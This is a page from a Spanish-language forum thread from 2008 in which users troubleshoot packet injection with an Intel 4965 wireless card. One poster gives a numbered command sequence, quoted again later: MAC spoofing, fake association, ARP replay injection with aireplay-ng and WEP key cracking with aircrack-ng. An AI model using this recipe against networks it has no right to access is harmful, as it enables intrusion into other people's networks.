General > Universo Wireless

Inyectar con 4965

<< < (4/69) > >>

dexter back:

--- Cita de: Bht Sata en 07-12-2008, 12:45 (Domingo) ---Si, eso lo he leido, e intentado 1000 veces tambien   :P, se dice como asociar, pero si no puedo usar el aireplay, no se usar el wpa_suplicant para inyectar, ya que sabes tanto, me podrias decir como hacerlo?  ;) Gracias.

--- Fin de la cita ---

se asocia con wpa_suplicant

pero......................... se inyecta con el atake 3 de aireplay  ;D ;D ;D

un saludo dexter back

dexter back:

--- Cita de: pedrojose1989 link=topic=17964.msg101547#msg101547 date=1228666252 [quote ---Veamos por pasos. Lo primero que hago es poner la tarjeta en modo monitor con airmon-ng start wlan0. Hasta ahi bien.
Luego, me voy a una carpeta cualquiera, y ahi creo un archivo llamado wpa.conf que contiene los datos de arriba, cambiando el essid="WLAN_XX" y el bssid=XX:XX:XX:XX:XX:XX.(entiendo que aqui se pone el AP)
Lo guardo, y me voy a la consola y escribo wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0
Ahi es cuando me sale un error. Exactamente me sale esto:

ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy

De todas formas, despues me voy al airoscript (porque no me manejo muy bien con la consola), y hago un scan, luego selecciono mi wireless, con cliente, y luego uso el ataque 3(fragmentacion). Algunas veces me sale authentification succesful, pero en otras se me queda sending request, y en la consola izquierda, me sale reading packets, pero no suben los data ni los ARP con lo que entiendo que no esta inyectando.
Bueno, espero vuestras respuestas para que me digais donde estoy cometiendo el error.

--- Fin de la cita ---

ok checalo bien
solo va una ves................... ja ja ja  >:D >:D >:D

1.- airmon-ng start wlan0 channel
2.-ifconfig wlan0 down
3.-macchanger -m 00:11:22:33:44:55 wlan0
4.-ifconfig wlan0 up
5.-wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0  unicamente en tu caso, por que esa es tu ubicacion, ojo a los demas lectores en cambiar esto he!!! y dejalo asi con iwlan0 , ademas de que no importa que te salga el error que mensionas arriba  ;)


--- Citar --- ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
--- Fin de la cita ---
6.-airodump-ng -w dexter-back -c channel mon0
7.- aireplay-ng -3 -b mac ap -h 00:11:22:33:44:55 mon0
8.-aircrack-ng dexter-back.cap
9.-key found!!!

me gustaria hacerles un video tutorial pero la verdad es que me han dado lata los grabadores de pantalla
espero y les sirva esta mini guia  >:( >:( >:(

un saludo dexter back

*dudux:

--- Código: ---me gustaria hacerles un video tutorial pero la verdad es que me han dado lata los grabadores de pantalla
--- Fin del código ---

lleva wink instalado y ees muy facil
sino instala xvidcapture

Bht Sata:
ESta muy bien, ahora lo hago haber, gracias ^^, pero porque me sale el chipset como unknow? Gracias por la ayuda ^^

pedrojose1989:

--- Cita de: dexter back en 08-12-2008, 10:16 (Lunes) ---
--- Cita de: pedrojose1989 link=topic=17964.msg101547#msg101547 date=1228666252 [quote ---Veamos por pasos. Lo primero que hago es poner la tarjeta en modo monitor con airmon-ng start wlan0. Hasta ahi bien.
Luego, me voy a una carpeta cualquiera, y ahi creo un archivo llamado wpa.conf que contiene los datos de arriba, cambiando el essid="WLAN_XX" y el bssid=XX:XX:XX:XX:XX:XX.(entiendo que aqui se pone el AP)
Lo guardo, y me voy a la consola y escribo wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0
Ahi es cuando me sale un error. Exactamente me sale esto:

ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy

De todas formas, despues me voy al airoscript (porque no me manejo muy bien con la consola), y hago un scan, luego selecciono mi wireless, con cliente, y luego uso el ataque 3(fragmentacion). Algunas veces me sale authentification succesful, pero en otras se me queda sending request, y en la consola izquierda, me sale reading packets, pero no suben los data ni los ARP con lo que entiendo que no esta inyectando.
Bueno, espero vuestras respuestas para que me digais donde estoy cometiendo el error.

--- Fin de la cita ---

ok checalo bien
solo va una ves................... ja ja ja  >:D >:D >:D

1.- airmon-ng start wlan0 channel
2.-ifconfig wlan0 down
3.-macchanger -m 00:11:22:33:44:55 wlan0
4.-ifconfig wlan0 up
5.-wpa_supplicant -c/root/swireless/wpa.conf -Dwext -iwlan0  unicamente en tu caso, por que esa es tu ubicacion, ojo a los demas lectores en cambiar esto he!!! y dejalo asi con iwlan0 , ademas de que no importa que te salga el error que mensionas arriba  ;)


--- Citar --- ioctl[SIOCSIWAUTH]: Operation not supported
WEXT auth param 4 value 0x0 - ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
Failed to initiate AP scan.
ioctl[SIOCGIWSCAN]: Resource temporarily unavailable
ioctl[SIOCSIWSCAN]: Device or resource busy
--- Fin de la cita ---
6.-airodump-ng -w dexter-back -c channel mon0
7.- aireplay-ng -3 -b mac ap -h 00:11:22:33:44:55 mon0
8.-aircrack-ng dexter-back.cap
9.-key found!!!

me gustaria hacerles un video tutorial pero la verdad es que me han dado lata los grabadores de pantalla
espero y les sirva esta mini guia  >:( >:( >:(

un saludo dexter back

--- Fin de la cita ---
Muchisimas graciasssss. Por fin he conseguido inyectar a un rate de 480pps. ¿Cuantos data son necesarios para que el aircrack me diga key found? Porque yo he llegado a sacar 411000 IVs y despues de estar el aircrack mas de 15 minutos analizando keys (hasta unos 3 millones), no me sale eso.

Navegación

[0] Índice de Mensajes

[#] Página Siguiente

[*] Página Anterior

Ir a la versión completa